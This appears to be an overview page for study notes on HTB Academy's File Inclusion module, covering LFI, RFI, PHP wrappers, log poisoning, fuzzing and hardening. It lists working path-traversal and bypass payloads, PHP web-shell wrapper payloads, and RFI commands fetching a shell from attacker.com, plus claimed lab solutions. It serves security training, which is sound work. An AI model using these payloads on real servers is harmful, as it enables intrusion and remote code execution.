Complete guide covering Local File Inclusion (LFI), Remote File Inclusion (RFI), and advanced file inclusion techniques from HTB Academy's File Inclusion module.
- Basic LFI Techniques - Fundamentals, path traversal, common files, and HTB Academy labs
- Advanced Bypasses & PHP Filters - Filter bypasses, PHP filters, and source code disclosure
- PHP Wrappers for RCE - Data, Input, and Expect wrappers for remote code execution
- Remote File Inclusion (RFI) - HTTP, FTP, and SMB protocols for external file inclusion
- File Upload + LFI Combinations - Malicious image uploads, zip/phar wrappers
- Log Poisoning Techniques - Session, Apache, SSH, Mail, and FTP log poisoning
- Automated Scanning & Tools - Parameter discovery, wordlist fuzzing, automated tools
- Prevention & Hardening - Secure coding, server hardening, WAF protection
- Skills Assessment Walkthrough - Complete HTB Academy capstone challenge
# Basic path traversal
../../../../etc/passwd
../../../../windows/system32/drivers/etc/hosts
# Bypass filters
....//....//....//etc/passwd # Non-recursive bypass
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd # URL encoding
./languages/../../../../etc/passwd # Approved path bypass
../../../../etc/passwd%00 # Null byte (PHP < 5.3)# Data wrapper
data://text/plain,<?php system($_GET['cmd']); ?>&cmd=id
# Input wrapper (POST)
curl -X POST --data '<?php system($_GET["cmd"]); ?>' "URL?file=php://input&cmd=whoami"
# Expect wrapper
expect://id
# PHP filters (source disclosure)
php://filter/convert.base64-encode/resource=index.php# HTTP RFI
http://attacker.com/shell.php&cmd=id
# FTP RFI
ftp://attacker.com/shell.php&cmd=whoami
# SMB RFI (Windows)
\\attacker.com\share\shell.php&cmd=dir# Apache/Nginx logs
/var/log/apache2/access.log
/var/log/nginx/access.log
# SSH logs
/var/log/auth.log
# PHP sessions
/var/lib/php/sessions/sess_SESSIONID
# Process environment
/proc/self/environAll guides include complete solutions for HTB Academy File Inclusion module labs:
- Basic LFI Lab - Finding users and reading flags
- LFI Bypasses Lab - Non-recursive and encoding bypasses
- PHP Filters Lab - Source code disclosure techniques
- PHP Wrappers Lab - RCE via data, input, and expect wrappers
- RFI Lab - HTTP, FTP, and SMB remote file inclusion
- File Upload + LFI Lab - Malicious image uploads and wrapper techniques
- Log Poisoning Lab - Session poisoning and Apache log injection
- Automated Scanning Lab - Parameter discovery and fuzzing techniques
- Prevention Lab - PHP configuration and security hardening
- Skills Assessment - Multi-technique exploitation chain
# Basic LFI testing
curl "http://target.com/lfi.php?file=../../../../etc/passwd"
# PHP filter source disclosure
curl "http://target.com/lfi.php?file=php://filter/convert.base64-encode/resource=index.php"
# RFI with remote shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80
curl "http://target.com/lfi.php?file=http://attacker.com/shell.php&cmd=id"- ffuf - Parameter and payload fuzzing
- LFiFreak - Automated LFI exploitation
- liffy - LFI exploitation tool
- kadimus - LFI/RFI scanner and exploiter
- Burp Suite - Parameter discovery and testing
/opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt/opt/useful/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt
# Parameter identification
ffuf -w burp-parameter-names.txt:FUZZ -u "http://target.com/page.php?FUZZ=test"
# Basic LFI testing
ffuf -w lfi-linux.txt:FUZZ -u "http://target.com/page.php?file=FUZZ" -mc 200# Test for RCE capabilities
# 1. Try PHP wrappers (data, input, expect)
# 2. Attempt RFI (HTTP, FTP, SMB)
# 3. File upload + LFI combinations
# 4. Log poisoning techniques# System enumeration
# Flag discovery
# Privilege escalation
# Persistent access- Input validation and sanitization
- Whitelist allowed files/paths
- Use
basename()for file operations - Avoid user input in file functions
# php.ini security settings
allow_url_fopen = Off
allow_url_include = Off
open_basedir = /var/www/html
disable_functions = system,exec,shell_exec,passthru- ModSecurity rules for LFI detection
- Path traversal pattern blocking
- PHP wrapper filtering
- Null byte injection prevention
🟢 Beginner → Basic LFI Techniques
🟡 Intermediate → Advanced Bypasses → PHP Wrappers
🟠 Advanced → RFI → Log Poisoning
🔴 Expert → Automated Scanning → Skills Assessment
This comprehensive file inclusion guide covers 100% of HTB Academy's File Inclusion module, providing practical knowledge for both offensive security testing and defensive implementation.